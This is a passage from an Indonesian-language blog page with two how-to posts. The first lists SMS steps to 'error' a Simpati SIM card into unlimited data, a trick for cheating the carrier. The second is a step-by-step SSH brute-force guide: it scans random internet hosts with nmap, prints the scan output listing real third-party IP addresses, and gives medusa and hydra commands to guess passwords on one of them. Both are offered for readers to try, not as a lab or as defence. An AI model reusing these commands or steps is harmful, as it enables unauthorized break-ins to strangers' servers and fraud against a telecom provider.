Meet The Author

I'm Chandeep J, An 18 years old blogger Currently living in Tamil Nadu, India. I'm a Skilled Blogger, web Developer and Loves to play with Codes And Creating new things as a web Designer.

author

Cara mengerorkan kartu simpati

Leave a Comment
Part 1: Lewat HP
1. Beli Kartu Simpati,minimal pulsa Rp3000
2. Register nama, alamat seperti biasa.
3. Ketik sms FLASH ON 2000 kirim ke 3636
4. Balas dengan FLASH YA
5. Tunggu balasan sms Paket FLASH telah aktif
6. Sms FLASH ON 500 kirim ke 3636
7. Balas dengan FLASH YA
8. Tunggu balasan sms Paket FLASH telah aktif
9. Ketik sms FLASH OFF kirim ke 3636
10. Cabut kartu lalu masukkan ke modem

Part 2: Lewat Modem (ato masih bisa lewat HP, langsung ke nomer 12)
11. Konekin modem (gak usah browsing)
12. Jangan diskonek lalu sms melalui aplikasi modem ketik FLASH YA kirim ke 3636.
13. Ketik sms UL INFO kirim ke 3636
14. Pastikan anda mendapat sms balasan Sisa Fair Use Paket TSELFlash Unlimited Anda 0 MB. Berlaku s/d E99 hingga pukul 23:59,.
Hack/Error Qos berhasil...
SUDAH DI TEST DAN BERHASIL....
Read More

Cara Hacking SSH (secure shell) / BRUTEFORCE SSH

Leave a Comment
Tools yang di butuhkan:

1.NMAP
2.TOOLS PASSWORD ATTACK, SEPERTI:MEDUSA/HYDRA
3.WORDLIST DAN PASSWORDLIST

Langkah-langkah adalah

1.buka NMAP,
ketik command pada nmap.
nmap -v -iR 1000 -Pn -p 22 --open
(tergantung dari port yang anda ingin scan)

setelah anda mendapat output seperti di bawah ini:

Nmap scan report for 93.170.76.243
Host is up (0.89s latency).
PORT STATE SERVICE
22/tcp open ssh

Nmap scan report for rough.flashyloris.com (5.231.1.168)
Host is up (1.0s latency).
PORT STATE SERVICE
22/tcp open ssh

Nmap scan report for bb42-61-150-84.singnet.com.sg (42.61.150.84)
Host is up (0.44s latency).
PORT STATE SERVICE
22/tcp open ssh

Nmap scan report for 74.d9.85ae.static.theplanet.com (174.133.217.116)
Host is up (0.84s latency).
PORT STATE SERVICE
22/tcp open ssh

ini tandanya nmap sudah berhasil menemukan port yang up dah host yang aktif.

3.langkah selanjutnya adalah pilih salah satu port yang ingin di bruteforce untuk mendapatkan tipe dari SSH apakah DSA ataupun RSA key.
contoh syntax: ping -c 4 93.170.76.243

jika mendapat output seperti di bawah ini:

PING 93.170.76.243 (93.170.76.243) 56(84) bytes of data.
64 bytes from 93.170.76.243: icmp_seq=1 ttl=51 time=365 ms
64 bytes from 93.170.76.243: icmp_seq=2 ttl=51 time=650 ms
64 bytes from 93.170.76.243: icmp_seq=3 ttl=51 time=670 ms
64 bytes from 93.170.76.243: icmp_seq=4 ttl=51 time=677 ms

--- 93.170.76.243 ping statistics ---
4 packets transmitted, 4 received, 0% packet loss, time 3002ms
rtt min/avg/max/mdev = 365.593/590.750/677.146/130.376 ms

ini artinya host aktif dan bisa di brutforce menggunakan hydra/medusa.

4.lakukan intense scan dengan perintah pada NMAP

syntax: nmap -T4 -A -O -v 93.170.76.243

5.setelah mendapat jenis DSA dan RSA key dari proses di atas. lakukan langkah selanjutnya yaitu dengan bruteforce attack.

(anda harus mempersiapkan wordlist dan passwordlist terlebih dahulu)

6.lakukan bruteforce dengan memakai salah satu tools password attack pada backtrack. medusa atau hydra.

syntax untuk penggunaan medusa.

medusa -h 93.170.76.243 -n 22 -U /root/brute/user.txt -P /root/brute/pass.txt -M ssh

syntax untuk penggunaan hydra.

hydra 93.170.76.243 -L /root/brute/user.txt -P /root/brute/pass.txt -t 1 -e ns -f -v -o /root/hacking.txt

Selamat mencoba 
Read More

Text Widget

Seacrh By Labels

Followers

Sample Text

Definition List

Unordered List

Flickr

About

Join us on facebook

Follow us on FB

Blogger news

Follow me ok

Diberdayakan oleh Blogger.

Feature Post

Wikipedia

Hasil penelusuran

Popular Posts

Recent Posts

Popular Posts

Popular Posts